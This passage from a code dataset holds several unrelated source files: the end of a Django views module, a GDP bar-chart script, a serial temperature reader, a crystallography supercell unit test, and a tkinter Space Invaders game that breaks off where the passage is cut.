JsonResponse({'success': False})\n return JsonResponse({'success': False})\n\n\n@group_required(['training_assistant'])\ndef assign_trainee_role(request, pk):\n '''Make sure to call assign_destination first'''\n if request.is_ajax() and request.method == \"POST\":\n field = request.POST.get('field', None)\n if field in DESTINATION_FIELDS:\n trainee_id = request.POST.get('trainee_id', 0)\n is_contact = request.POST.get('is_contact', 'false') == 'true'\n try:\n gt = GospelTrip.objects.get(id=pk)\n tr = Trainee.objects.get(id=trainee_id)\n dests = tr.destination.filter(gospel_trip=gt)\n if dests.exists():\n dest = dests.first()\n dest.set_trainee_as(tr, field, set_to=is_contact)\n dest.save()\n return JsonResponse({'success': True})\n else:\n return JsonResponse({'noDest': True})\n except ObjectDoesNotExist:\n return JsonResponse({'dataError': True})\n return JsonResponse({'badRequest': True})\n\n\n@csrf_exempt\ndef upload_image(request):\n form = LocalImageForm(request.POST, request.FILES)\n if form.is_valid():\n f = form.save()\n return JsonResponse({'location': f.file.url}, status=200)\n errors = {f: e.get_json_data() for f, e in form.errors.items()}\n return JsonResponse({'success': 'False', 'errors': errors}, status=500)\n\n\n@group_required(['training_assistant'])\ndef clear_application(request, pk, trainee):\n gt = get_object_or_404(GospelTrip, pk=pk)\n tr = get_object_or_404(Trainee, pk=trainee)\n if request.is_ajax() and request.method == \"POST\":\n Answer.objects.filter(gospel_trip=gt, trainee=tr).update(response=None)\n return JsonResponse({'success': True})\n return JsonResponse({'success': False})\n","sub_path":"ap/gospel_trips/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":23614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"274198179","text":"\n\n\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif']=['SimHei']\nplt.rcParams['axes.unicode_minus']=False\nplt.subplot(1,1,1)\n\nimport xlrd\ndata1=xlrd.open_workbook('C:\\\\Users\\Administrator\\Desktop\\macroeconomics\\\\gfx.xlsx')\nprint(data1)\n\ntable1=data1.sheets()[0]\nx=table1.col_values(0)\n\ny=table1.col_values(1)\n\nplt.bar(x,y,width=0.5,align='center',label='GDP',color='g')\n\nplt.title('国内生产总值',color='r')\n\nfor a,b in zip(x,y):\n plt.text(a,b,b,ha='center',va='bottom',fontsize=12,rotation=90)\n\nplt.xlabel('年份',color='b')\nplt.ylabel('国内生产总值(亿元)',color='b')\n\nplt.xticks(rotation=40)\n\nplt.legend()\n\nplt.show()\n","sub_path":"bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"238029447","text":"import serial\nfrom datetime import datetime\n\nser = serial.Serial('/dev/ttyACM0', 9600)\ni = 0\n\nwhile i < 100:\n temperatura = ser.readline().decode('utf-8')\n temperatura = temperatura.strip('\\n')\n \n hora = datetime.now().strftime('%H:%M:%S')\n str = '{};{};{}'.format(i, hora, temperatura)\n print(str)\n i += 1\n","sub_path":"aula9.py","file_name":"aula9.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"525452757","text":"from __future__ import division\n\nimport time, os\nimport iotbx.pdb\nfrom qrefine import super_cell\nfrom libtbx.test_utils import approx_equal\nimport run_tests\n\npdb_str = \"\"\"\nCRYST1 10.000 10.000 10.000 90.00 90.00 90.00 P 1\nATOM 9 O HOH Z 333 5.000 5.000 5.000 1.00137.30 
O\nTER\n\"\"\"\n\npdb_str_super_sphere_answer = \"\"\"\nCRYST1 10.000 10.000 10.000 90.00 90.00 90.00 P 1\nSCALE1 0.100000 0.000000 0.000000 0.00000\nSCALE2 0.000000 0.100000 0.000000 0.00000\nSCALE3 0.000000 0.000000 0.100000 0.00000\nATOM 1 O HOH Z 333 5.000 5.000 5.000 1.00137.30 O\nTER\nATOM 1 O HOHSS 0 5.000 5.000 15.000 1.00137.30 O\nATOM 1 O HOHSS 1 5.000 -5.000 5.000 1.00137.30 O\nATOM 1 O HOHSS 2 5.000 5.000 -5.000 1.00137.30 O\nATOM 1 O HOHSS 3 5.000 15.000 5.000 1.00137.30 O\nATOM 1 O HOHSS 4 -5.000 5.000 5.000 1.00137.30 O\nATOM 1 O HOHSS 5 15.000 5.000 5.000 1.00137.30 O\nTER\n\"\"\"\n\ndef run(prefix):\n \"\"\"\n Exercise supercell.\n \"\"\"\n of = open(\"%s.pdb\"%prefix,\"w\")\n print >> of, pdb_str\n of.close()\n pdb_inp = iotbx.pdb.input(source_info=None, lines=pdb_str)\n ph = pdb_inp.construct_hierarchy()\n sites_cart_start = ph.atoms().extract_xyz()\n o = super_cell.expand(\n pdb_hierarchy = ph,\n crystal_symmetry = pdb_inp.crystal_symmetry(),\n select_within_radius = 11)\n #\n o.write_super_cell_selected_in_sphere(file_name=\"%s_super_sphere.pdb\"%prefix)\n sites_cart = ph.atoms().extract_xyz()\n o.update(sites_cart = sites_cart)\n o.write_super_cell_selected_in_sphere(file_name=\"%s_super_sphere.pdb\"%prefix)\n #\n sites_cart_super_sphere_answer = iotbx.pdb.input(source_info=None,\n lines=pdb_str_super_sphere_answer).atoms().extract_xyz()\n super_sphere_answer = list(sites_cart_super_sphere_answer.as_double())\n super_sphere = list(o.ph_super_sphere.atoms().extract_xyz().as_double())\n super_sphere_answer.sort()\n super_sphere.sort()\n assert approx_equal(super_sphere_answer,super_sphere)\n\nif(__name__ == \"__main__\"):\n prefix = os.path.basename(__file__).replace(\".py\",\"\")\n run_tests.runner(function=run, prefix=prefix, disable=False)\n","sub_path":"tests/unit/tst_14.py","file_name":"tst_14.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"3415508","text":"\n'''\nVersion : Python 3\n'''\nimport tkinter as tk\nfrom tkinter import *\nfrom winsound import *\nimport random\nimport json\nimport os\n\nclass Defender(object):\n def __init__(self,game): \n self.width = 40 #gestion de la largeur du defender\n self.height = 20 #gestion de la hauteur\n self.move_delta = 20 #gestion de la vitesse de deplacement\n self.max_fired_bullets = 7 #gestion du nombre de projectiles pouvant etre tirés simultanement\n self.fired_bullets = [] #gestion de la mise en memoire des projectiles tirés\n self.point=0\n self.game=game\n self.largeur=game.width\n self.hauteur=game.height\n self.image = PhotoImage(file='Defender.png').zoom(1).subsample(2)\n def install_in(self, canvas):\n dificult=self.game.diff_var.get()\n if dificult==1000:\n self.point_en_plus=10\n self.vie=4 \n if dificult==666:\n self.point_en_plus=20\n self.vie=3\n if dificult==333:\n self.point_en_plus=50\n self.vie=2\n \n self.vie_barre=[None]*self.vie\n self.point=0\n lx = 400 + self.width/2 #Permet de centrer le personnage\n ly = 600 - self.height - 10 #permet d elever le personnage\n #self.id = canvas.create_rectangle(lx, ly, lx + self.width, ly + self.height, fill=\"green\") # creation d un rectangle blanc qui representeras le defender\n self.id=canvas.create_image(lx,ly, image=self.image)\n for i in range(self.vie):\n \n self.aff=canvas.create_rectangle(self.largeur/100 +50*i, 50, self.largeur/100 + self.width +50*i, 50 + self.height, fill=\"green\")\n self.vie_barre[i] = self.aff \n\n \n self.bullet=Bullet(self)\n 
self.canvas=canvas\n def move_in(self,canvas, dx): \n canvas.move(self.id, dx, 0) #permet de deplacer le defender en fonction de la valleur de dx\n def get_id(self):\n return self.id #retourne l identifiant du defender c'est pratique pour d'autres class\n \n def get_bullet(self):\n return self.fired_bullets #retourne la liste des projectiles tirés par le defender\n \n def fire(self,canvas):\n\n if len(self.fired_bullets) < self.max_fired_bullets: #si la taille de la liste est inférieur a la valleur du nombre max de projectiles que l'on peut tirer alors:\n \n self.bullet=Bullet(self) #création d'un nouvel objet bullet : (c'est un projectile)\n self.bullet.install_in(canvas) #on apelle la methode qui premetteras de desiner un projectile\n self.fired_bullets.append(self.bullet) #on stocke l'objet dans la liste \n def destruction(self,canvas):\n self.bullet.set_destru()\n canvas.delete(self.id)\n self.game.class_score.supr()\n for i in range(self.vie):\n self.canvas.delete(self.vie_barre[i])\n\n def Barre_de_vie(self):\n self.vie-=1\n self.canvas.delete(self.vie_barre[self.vie])\n\n\nclass Explosion(object):\n def __init__(self,game):\n self.canvas=game.canvas\n self.defender=game.defender\n def install_in(self,x,y):\n \n self.musique_explo = PlaySound(\"Explosion.wav\", SND_FILENAME | SND_ASYNC)\n self.image = PhotoImage(file='explosion.gif').zoom(1).subsample(2)\n self.explosion_id=self.canvas.create_image(x, y, image=self.image)\n #print(\"ca explose haaaaaaaaaaaaaaaaaaaaaaaaaa\")\n self.canvas.after(100,self.supr)\n def supr(self):\n self.canvas.delete(self.explosion_id) \n \n\nclass Bullet(object):\n destru=False\n\n def __init__(self,shooter):\n self.radius = 5 #gestion de la taille du projectile\n self.color= \"red\" #gestion de la couleur \n self.speed= 8 #gestion de la vitesse \n self.animspeed=50\n \n self.y=580 #initialisation de la coordonée y de départ \n self.stop=0 #initialisation d'une variable pour \"détruire\" le projectile \n self.defender=shooter #appel de l'objet defender déja créé dans cette class\n self.shooter=self.defender.get_id() #récupération de l'id de çe dernier\n Bullet.destru=False\n def install_in(self,canvas):\n self.canvas=canvas #récupération du canvas \n self.x=canvas.coords(self.shooter)[0] #récuperation des coordonées en x du defender plus 20 pour avoir son milieu \n self.id_tir=canvas.create_oval(self.x-self.radius,self.y+self.radius,self.x+self.radius,self.y-self.radius,width=0,fill=self.color) #création du projectile et stockage de son id dans une variable\n \n self.move_in() #appel de la fonction de déplacement\n def get_tir(self):\n return self.id_tir \n def set_stop(self): #cette methode est appeler plus bas dans le code\n self.stop=1 \n def set_destru(self):\n Bullet.destru=True\n \n\n\n def move_in(self):\n if Bullet.destru==True:\n self.destruction()\n return 0\n self.canvas.move(self.id_tir,0,-self.speed)\n if self.canvas.coords(self.id_tir)[1]>0 and self.stop==False: #si la coordonée en y du projectile est supérieur a 0 et que stop est a 0 (False) alors on rapelle la methode\n \n self.canvas.after(self.animspeed,self.move_in) #appel d'une methode après un temps donnée \n else:\n\n if self.canvas.coords(self.id_tir)[1]<=0:\n self.defender.point =self.defender.point-10 #ici on gère le score : si le projectile est détruit et que ses coordonnées sont suppérieur au cadre alors on enlève 10 points\n self.defender.game.class_score.change_score()\n \n self.destruction()\n #print(\"detruit\") #test pour vérifier le mon fonctionnement \n def 
destruction(self):\n        self.defender.get_bullet().remove(self) # remove this projectile from the defender's list of fired bullets\n        self.canvas.delete(self.id_tir) # remove it from the canvas\n        \n        \nclass Bullet_alien(object):\n    destru=False\n\n    def __init__(self,alien,Fleet):\n        self.radius = 5 # projectile size\n        self.color= \"green\" # projectile colour\n        self.speed= 8 # projectile speed\n        self.animspeed=50\n        self.alien=alien\n        self.fleet=Fleet\n        self.max_alien_bullet=4\n        self.bunker_ici=False\n        self.stop=0 # flag used to \"destroy\" the projectile\n        Bullet_alien.destru=False\n    def install_in(self,canvas):\n        if self.fleet.game.activ_bunker.get()==1:\n            self.bunker_ici=True\n        self.canvas=canvas # keep a reference to the canvas\n        self.x=canvas.coords(self.alien.get_alien_id())[0]+10 # alien x coordinate, plus 10 to fire from its middle\n        self.y=canvas.coords(self.alien.get_alien_id())[1]+10 # alien y coordinate, plus 10 to fire from its middle\n        self.id_tir=canvas.create_oval(self.x-self.radius,self.y+self.radius,self.x+self.radius,self.y-self.radius,width=0,fill=self.color) # draw the projectile and keep its id\n        self.explosion=self.fleet.game.explosion\n        \n        self.move_in()\n\n    def move_in(self):\n        # NOTE: the comparison operators and several statements of this method were\n        # lost in the source dump; the on-screen test and the two bounding-box\n        # collision branches below are an assumed reconstruction based on the\n        # surviving symmetric checks and the Bunker/Defender/Explosion interfaces.\n        if Bullet_alien.destru==False:\n\n            \n            self.canvas.move(self.id_tir,0,+self.speed)\n            \n            try:\n\n                if self.canvas.coords(self.id_tir)[1]<self.fleet.hauteur: # the projectile is still on screen\n                    if self.bunker_ici==True:\n                        for i in range(len(self.fleet.bunker_list)):\n                            if self.fleet.bunker_list[i].get_etat()>0:\n\n                                if self.canvas.coords(self.id_tir)[0]>self.canvas.bbox(self.fleet.bunker_list[i].aff)[0]-10 and self.canvas.coords(self.id_tir)[3]>=self.canvas.bbox(self.fleet.bunker_list[i].aff)[1] and self.canvas.coords(self.id_tir)[2]<self.canvas.bbox(self.fleet.bunker_list[i].aff)[2]+10:\n                                    self.fleet.bunker_list[i].touched() # degrade the bunker\n                                    self.destruction()\n                                    return 0\n                    if self.canvas.coords(self.id_tir)[0]>self.canvas.bbox(self.fleet.defender.get_id())[0]-10 and self.canvas.coords(self.id_tir)[3]>=self.canvas.bbox(self.fleet.defender.get_id())[1] and self.canvas.coords(self.id_tir)[2]<self.canvas.bbox(self.fleet.defender.get_id())[2]+10:\n                        self.fleet.defender.Barre_de_vie() # the defender loses one life\n                        self.explosion.install_in(self.canvas.coords(self.id_tir)[0],self.canvas.coords(self.id_tir)[1])\n                        self.destruction()\n                        if self.fleet.defender.vie==0:\n                            self.fleet.game.perdu() # no lives left\n                        return 0\n                    self.canvas.after(self.animspeed,self.move_in)\n                else:\n                    self.destruction() # the projectile left the screen\n            except:\n                None\n\n    def destruction(self):\n        self.fleet.fired_bullets_alien.remove(self) # remove this projectile from the fleet's list of fired bullets\n        self.canvas.delete(self.id_tir)\n\n\nclass Score_aff(object):\n    # Assumed reconstruction: the original Score_aff definition was lost in the\n    # source dump; only its interface (install_in/change_score/supr and the\n    # (defender, canvas, game) constructor) is known from the call sites.\n    def __init__(self,defender,canvas,game):\n        self.defender=defender\n        self.canvas=canvas\n        self.game=game\n    def install_in(self):\n        self.aff=self.canvas.create_text(self.game.width/2,30,text=\"Score : 0\",font=(\"Arial\", 20),fill=\"red\")\n    def change_score(self):\n        self.canvas.itemconfigure(self.aff,text=\"Score : \"+str(self.defender.point))\n    def supr(self):\n        self.canvas.delete(self.aff)\n\n\nclass Fleet(object):\n    # The Fleet initialiser and its install_in method were also lost in the\n    # source dump; they are assumed to set self.game, self.canvas, self.defender,\n    # self.alien, self.largeur, self.hauteur, self.aliens_fleet,\n    # self.aliens_fleet_bis, self.fleet_size, self.fleet_speed,\n    # self.alien_x_delta, self.alien_y_delta, self.fired_bullets_alien,\n    # self.max_fired_alien_bullet, self.fire_Alien_speed, self.bunker_list,\n    # self.Nb_bunker_actif, self.active and self.signal, on which the surviving\n    # methods below rely.\n\n    def move_it(self):\n        if self.fleet_size>=1: # as long as aliens are alive, run the loops below\n            i=0\n            if self.active==False: # if False there is neither victory nor defeat, so the aliens keep moving\n                #print(self.fleet_size) \n                \n                while i < len(self.aliens_fleet):# this loop moves the aliens along the horizontal axis\n                \n                    if self.aliens_fleet[i].get_alive()==True: # check that the alien is alive\n                        '''\n                        The block below checks whether the user enabled bunkers;\n                        if so, whether one bunker is left that the alien shots have not destroyed;\n                        if so, whether a still-living alien is level with the bunkers;\n                        if so, the player has lost.\n\n\n                        '''\n\n\n\n\n\n                        if self.game.activ_bunker.get()==1:\n                            if self.Nb_bunker_actif>=1:\n\n                                #print(self.Nb_bunker_actif)\n                                if self.canvas.bbox(self.aliens_fleet[i].get_alien_id())[3] >= self.bunker_list[0].y2-20:\n\n                                    self.active=True\n\n                                    self.destruction()\n\n                                    self.game.perdu()# call the method that shows the defeat screen\n                                    return 0\n                        \n\n\n\n                        if self.canvas.coords(self.aliens_fleet[i].get_alien_id())[1] > self.canvas.bbox(self.defender.get_id())[1]-5:# check whether a living alien's y1 collides with the top of the defender\n                            \n                            if self.active==False:# destroy the aliens\n                                self.active=True\n\n                                self.destruction()\n\n                                self.game.perdu()# call the method that shows the defeat screen\n                                return 0\n                    self.aliens_fleet[i].move_in(self.alien_x_delta,0)# move every alien\n                    i+=1\n            i=0\n            while i < len(self.aliens_fleet): # this whole loop checks whether a living alien touches the screen edge and reacts accordingly\n\n                
j=0\n '''\n La partie de code qui suit a pour but de tester si un alien encore en vie touche le bord de l'écran si oui \n on inverse leur sens de déplacenment sur l'axe horizontal \n et on déplace tout les aliens une fois vers le bas\n\n\n '''\n\n\n\n if self.aliens_fleet[i].get_alive()==True:\n if self.canvas.bbox(self.aliens_fleet[i].get_alien_id())[2] > self.largeur or self.canvas.bbox(self.aliens_fleet[i].get_alien_id())[0] < 0:\n self.alien_x_delta = -self.alien_x_delta\n #i=len(self.aliens_fleet) #petite astuce me permettant de de ne déplacer qu'une fois vers le bas\n while j < len(self.aliens_fleet):\n self.aliens_fleet[j].move_in(self.alien_x_delta,self.alien_y_delta)\n j+=1\n i+=1\n if self.fleet_size<5: #augmentation de la vitesse si il reste moins de aliens en vie\n self.fleet_speed=25 \n\n self.canvas.after(self.fleet_speed,self.move_it) #rappel de ma fonction\n else:\n\n k=0\n while k < len(self.aliens_fleet):\n self.aliens_fleet[k].destruction()\n k+=1\n\n\n\n if self.active==False:\n self.active=True\n if self.signal==True:\n \n self.game.titre()\n else:\n self.game.Winn()#appel de la methode qui affiche l'ecrant de victoire \n\n def feu(self):\n if len(self.fired_bullets_alien) < self.max_fired_alien_bullet and self.active==False: #si la taille de la liste est inférieur a la valleur du nombre max de projectiles que l'on peut tirer alors:\n j=random.choice(self.aliens_fleet_bis)\n self.bullet_alien=Bullet_alien(j,self) #création d'un nouvel objet bullet : (c'est un projectile)\n self.bullet_alien.install_in(self.canvas) #on apelle la methode qui premetteras de desiner un projectile\n j.Animation.tir()\n self.fired_bullets_alien.append(self.bullet_alien) #on stocke l'objet dans la liste \n if self.active==False:\n\n self.canvas.after(self.fire_Alien_speed,self.feu)\n\n def Anime_les(self):\n if self.active==False:\n i=len(self.aliens_fleet_bis)\n i-=1\n alien=self.aliens_fleet_bis[random.randint(0,i)]\n if alien.anime==False:\n\n alien.anime_moi()\n self.canvas.after(500,self.Anime_les)\n \n def fin(self):\n self.signal=True\n try:\n \n self.bullet_alien.set_destru()\n except:\n None\n self.supr_bunker()\n self.alien.change()\n def supr_bunker(self):\n if self.game.activ_bunker.get()==1:\n\n for i in range(len(self.bunker_list)):\n self.bunker_list[i].suppr()\n def nb_bunker_actif(self):\n self.Nb_bunker_actif-=1\n\n \n def get_fleet(self):\n return self.aliens_fleet\n def destruction(self):\n\n k=0\n while k < len(self.aliens_fleet):\n self.aliens_fleet[k].destruction()\n k+=1\n self.canvas.delete(self.aliens_fleet) \n \n\nclass Alien(object):\n destru=False\n \n def __init__(self,Defender):\n self.defender=Defender\n self.alive = True\n self.anime=False\n \n\n def install_in(self,x,y,Canvas,Fleet):\n self.canvas=Canvas\n self.image = PhotoImage(file='alien.png').zoom(1).subsample(2)#appel de l'imege et permet de redefinir ça taille ici elle est moitié plus petite\n self.multiplicateur_bonus=1\n self.fleet=Fleet\n self.alien_id=self.canvas.create_image(x, y, image=self.image)#affichage de l'image pour des coordonnées x et y données\n Alien.destru=False\n self.Animation=AnimAlien(self)\n def anime_moi(self):\n #print(\"ici\")\n self.Animation.start()\n self.anime=True\n def non_anime(self):\n self.anime=False\n\n\n\n\n def touched_by(self,canvas): #dans cette methode on va gerer les conditions de mort d'un alien et ses conséquences\n\n #print(self.overlapped)\n \n for i in range(len(self.defender.get_bullet())):\n \n if self.alive == True:\n \n #print(self.overlapped)\n 
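                # How this hit test works in isolation: Tkinter's find_overlapping
                # returns the ids of every canvas item whose bounding box intersects
                # the given rectangle, so a shot has hit this alien when one of the
                # overlapping ids belongs to a live bullet. A minimal sketch
                # (ids and coordinates illustrative):
                #   x1, y1, x2, y2 = canvas.bbox(alien_id)
                #   hits = canvas.find_overlapping(x1, y1, x2, y2)  # includes alien_id itself
                #   for bullet in defender.get_bullet():
                #       if bullet.get_tir() in hits:
                #           ...  # register the hit and stop the bullet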
self.liste=self.defender.get_bullet()#ici on récupère la liste des projectiles qui sont actuellement a l'écrant\n \n\n\n for j in range(len(self.overlapped)):\n\n\n\n\n if self.overlapped[j]==self.liste[i].get_tir():# on sait que l'element 0 de la liste c'est forcément l'id de l'alien (Cf code ci-dessous) l'element en position 1 est un element qui rentre en colision avec l'alien on vérifie donc si cette element est présent dans la liste\n #print(\"oui \")\n self.defender.point+=self.defender.point_en_plus*self.multiplicateur_bonus\n self.liste[i].set_stop() #on apelle une méthode de la class bullet\n self.kill_alien(canvas)\n self.fleet.game.class_score.change_score()\n return 0\n #self.fleet.get_fleet().remove(self)\n #self.canvas.delete(self.alien_id)\n else:\n None\n def kill_alien(self,canvas):\n self.fleet.fleet_size-=1\n \n self.image1 = PhotoImage(file='explosion.gif').zoom(1).subsample(2) #ici on change l'image \n self.canvas.itemconfigure(self.alien_id, image=self.image1)\n \n self.alive = False \n self.canvas.after(150,self.mort)\n\n def destruction(self):\n #print(\"je suis detruit\")\n self.canvas.delete(self.alien_id)\n \n def get_bullet(self):\n return self.fleet.fired_bullets_alien\n\n def mort(self):\n\n \n self.image1 = PhotoImage(file='test.png').zoom(1).subsample(2) \n self.canvas.itemconfigure(self.alien_id, image=self.image1)\n if Alien.destru == True:\n self.destruction()\n else:\n self.fleet.aliens_fleet_bis.remove(self)\n\n \n \n def get_def_id(self):\n return self.defender.get_id()\n def get_alien_id(self):\n return self.alien_id\n def get_alive(self):\n return self.alive\n def change(self):\n #print(\"change alien\")\n Alien.destru=True\n \n\n def move_in(self,dx,dy):\n if Alien.destru==True:\n self.kill_alien(self.canvas)\n \n self.x=dx\n self.y=dy\n self.canvas.move(self.alien_id,self.x,self.y)\n x1,y1,x2,y2 = self.canvas.bbox(self.alien_id)\n self.overlapped = self.canvas.find_overlapping(x1, y1, x2, y2)#on reherche tout les objets qui rentrent en colision dans une zone définie ici se sont les coordonnées entière de l'alien\n if len(self.overlapped)>1:\n self.touched_by(self.canvas)\n\nclass AnimAlien(object):\n def __init__(self,alien):\n self.imageA = PhotoImage(file='alien.png').zoom(1).subsample(2)\n self.imageB = PhotoImage(file='alien1_bis.png').zoom(1).subsample(2)\n self.imageC = PhotoImage(file='alien_charge.png').zoom(1).subsample(2)\n self.imageD = PhotoImage(file='alien_tir.png').zoom(1).subsample(2)\n self.alien=alien\n self.canvas=alien.canvas\n self.alien_id=alien.alien_id\n self.etat=0\n self.etat_tir=0\n def start(self):\n \n if self.alien.get_alive()==True:\n if self.etat==0:\n self.etat=1\n #print(\"la\")\n self.canvas.itemconfigure(self.alien_id, image=self.imageB)\n if self.etat_tir==0:\n\n self.canvas.after(600,self.end)\n\n \n def end(self):\n if self.alien.get_alive()==True:\n self.alien.multiplicateur_bonus=1\n self.etat=0\n self.etat_tir=0\n self.alien.non_anime()\n self.canvas.itemconfigure(self.alien_id, image=self.imageA)\n \n\n def tir(self):\n if self.etat_tir==0:\n\n self.etat=1\n self.etat_tir=1\n self.alien.multiplicateur_bonus=2\n self.canvas.itemconfigure(self.alien_id, image=self.imageD)\n self.canvas.after(300,self.tirB)\n def tirB(self):\n if self.alien.get_alive()==True:\n self.canvas.itemconfigure(self.alien_id, image=self.imageC)\n self.canvas.after(300,self.end)\n\n\n\nclass Bunker(object):\n def __init__(self,game,i):\n self.game=game\n self.largeur=game.width\n self.hauteur=game.height\n self.width = 80 #gestion de 
la largeur du bunker\n self.height = 20 #gestion de la hauteur\n self.i=i\n self.Nb_bunker = 2\n self.espacement=300\n self.canvas=game.canvas\n self.y2=self.hauteur/1.2 + self.height\n self.install_in()\n def install_in(self):\n self.etat=3\n \n \n \n self.aff=self.canvas.create_rectangle(self.largeur/6 +self.espacement*self.i, self.hauteur/1.2, self.largeur/6 + self.width +self.espacement*self.i, self.y2, fill=\"green\")\n \n def touched(self):\n self.etat-=1\n self.change_etat()\n def change_etat(self):\n if self.etat==2:\n\n self.canvas.itemconfigure(self.aff,fill=\"orange\")\n if self.etat==1:\n\n self.canvas.itemconfigure(self.aff,fill=\"red\")\n if self.etat==0:\n self.canvas.delete(self.aff)\n self.game.fleet.nb_bunker_actif()\n def suppr(self):\n self.canvas.delete(self.aff)\n\n def get_etat(self):\n return self.etat\n\n \n\n \nclass Score:\n def __init__(self, nom,points):\n self.nom=nom\n self.points=points\n def get_score(self):\n return self.points\n def __str__(self):\n return \"Le Joueur du nom de : \" + self.nom + \" a fait : \"+ str(self.points) \n\n\nclass Resultat(object):\n def __init__(self):\n self.lesScores=[]\n def ajout(self,score):\n position=0\n try:\n\n for i in range(len(self.lesScores)):\n if int(self.lesScores[i].get_score()) >= score.get_score():\n position = i+1\n\n self.lesScores.insert(position, score)\n #print(\"bla bla bla\")\n #print(position)\n except:\n self.lesScores.insert(1,score)\n \n\n def __str__(self):\n chaine=str()\n for e in self.lesScores:\n chaine=chaine + \"\\n\" + str(e)\n return chaine\n def suppr(self):\n del self.lesScores[:]\n\n def fromFile(cls,fich):\n f = open(fich,\"r\")\n\n tmp = json.load(f)\n\n liste = []\n\n for d in tmp:\n l=Score(d[\"nom\"],d[\"scores\"])\n\n liste.append(l)\n result=Resultat()\n result.lesScores= liste\n f.close()\n return result\n\n def toFile(self,fich):\n f = open(fich,\"w\")\n tmp = []\n for l in self.lesScores:\n\n d = {}\n d[\"nom\"]= l.nom\n d[\"scores\"]= l.points\n tmp.append(d)\n json.dump(tmp,f)\n f.close()\n\n\nclass Game(object):\n \n def __init__(self, frame):\n self.width=1000 #X largeur\n self.height=600 #Y hauteur \n self.frame=frame\n self.back_ground = PhotoImage(file='Espace_invader.png')\n self.canvas=tk.Canvas(self.frame,width=self.width, height=self.height,bg=\"black\")\n self.canvas.pack(side=\"top\", fill=\"both\", expand=True)\n self.canvas.create_image(0,0,anchor=NW,image=self.back_ground)\n self.defender=Defender(self)\n self.fleet=Fleet(self.width,self.height,self)\n self.nb=0\n self.actif= False\n self.defaite=False\n self.defender_present=False\n self.diff_var = IntVar()\n self.activ_bunker = IntVar()\n self.class_score=Score_aff(self.defender,self.canvas,self)\n self.resultat=Resultat()\n self.pseudo= StringVar() #permet de récuperer le texte de Entry\n self.explosion=Explosion(self)\n self.joueur_score=self.resultat\n self.posX_Boutton=self.width/1.1\n self.posY_Boutton=self.height/2\n self.lecture=False\n def start(self):\n\n self.titre()\n \n self.frame.winfo_toplevel().bind(\"\", self.keypress)\n \n def titre(self):\n try:\n self.boutton_score.destroy()\n self.canvas.delete(self.boutton_score_w)\n self.boutton_reset_score.destroy()\n self.canvas.delete(self.boutton_reset_score_w)\n\n self.canvas.delete(self.label_gg)\n \n except:\n None\n if self.lecture==False:\n self.lecture=True\n self.musique_explo = PlaySound(\"Accueil.wav\", SND_FILENAME | SND_ASYNC)\n 'création de multiple objet et intégration dans la fenettre'\n 
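        # The Resultat class defined above persists scores through a plain JSON
        # round-trip: toFile writes a list of {"nom": ..., "scores": ...} dicts and
        # fromFile rebuilds Score objects from them. A standalone sketch of the
        # same round-trip (file name as used by the game):
        #   import json
        #   scores = [{"nom": "invite", "scores": 120}, {"nom": "anna", "scores": 200}]
        #   with open("resultat.json", "w") as f:
        #       json.dump(scores, f)
        #   with open("resultat.json") as f:
        #       loaded = json.load(f)
        #   best = max(loaded, key=lambda d: d["scores"])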
self.boutton_score=Button(self.canvas,text=\"Score\",font=(\"Arial\", 20),bg=\"red\",fg=\"blue\", command=self.score) #création d'un boutton\n self.boutton_score_w=self.canvas.create_window(self.width/2,self.height/1.05, window=self.boutton_score) #mise du boutton a l'intérieur de notre canvas \n self.Label_Titre=self.canvas.create_text(self.width/2,self.height/4,text=\"Space Invader\", font=(\"Arial\", 30),fill=\"red\", )\n \n\n self.boutton_debut=Button(self.canvas,text=\"Jouer\",font=(\"Arial\", 40),bg=\"red\",fg=\"blue\", command=self.lancement)\n self.boutton_debut_w=self.canvas.create_window(self.width/2,self.height/2, window=self.boutton_debut)\n self.label_Consigne=self.canvas.create_text(self.width/8,self.height/20,text=\"Entrez un pseudo\", font=(\"Arial\", 20),fill=\"red\", )\n self.ecrire=Entry(self.canvas,font=\"Arial\",textvariable=self.pseudo,fg=\"black\")\n self.ecrire_w=self.canvas.create_window(self.width/8,self.height/8, window=self.ecrire)\n \n self.R1 = Radiobutton(self.canvas, text=\"Facile\", variable=self.diff_var,bg=\"green\", value=1000)\n self.R2 = Radiobutton(self.canvas, text=\"Normal\", variable=self.diff_var,bg=\"orange\", value=666) \n self.R3 = Radiobutton(self.canvas, text=\"Difficile\", variable=self.diff_var,bg=\"red\", value=333)\n self.R1_w = self.canvas.create_window(self.posX_Boutton,self.posY_Boutton-50, window=self.R1)\n self.R2_w = self.canvas.create_window(self.posX_Boutton,self.posY_Boutton, window=self.R2)\n self.R3_w = self.canvas.create_window(self.posX_Boutton,self.posY_Boutton+50, window=self.R3)\n self.diff_var.set(1000)\n self.label_bunker=self.canvas.create_text(self.posX_Boutton-800,self.posY_Boutton-100,text=\"Présence de bunker ?\", font=(\"Arial\", 15),fill=\"red\", )\n self.RChoix1 = Radiobutton(self.canvas, text=\"Oui\", variable=self.activ_bunker,bg=\"green\", value=1)\n self.RChoix2 = Radiobutton(self.canvas, text=\"Non\", variable=self.activ_bunker,bg=\"red\", value=0)\n self.RChoix1_w = self.canvas.create_window(self.posX_Boutton-800,self.posY_Boutton-50, window=self.RChoix1)\n self.RChoix2_w = self.canvas.create_window(self.posX_Boutton-800,self.posY_Boutton, window=self.RChoix2)\n self.activ_bunker.set(1)\n \n def lancement(self):\n if not self.pseudo.get():\n self.pseudo.set(\"invité\")#modifie la valleur du entry\n '''Supression de tout les elements du menu'''\n self.R1.destroy()\n self.R2.destroy()\n self.R3.destroy()\n self.canvas.delete(self.R1_w)\n self.canvas.delete(self.R2_w)\n self.canvas.delete(self.R3_w)\n self.RChoix1.destroy()\n self.RChoix2.destroy()\n self.canvas.delete(self.RChoix1_w)\n self.canvas.delete(self.RChoix2_w)\n self.ecrire.destroy()\n self.canvas.delete(self.Label_Titre)\n self.canvas.delete(self.label_bunker)\n 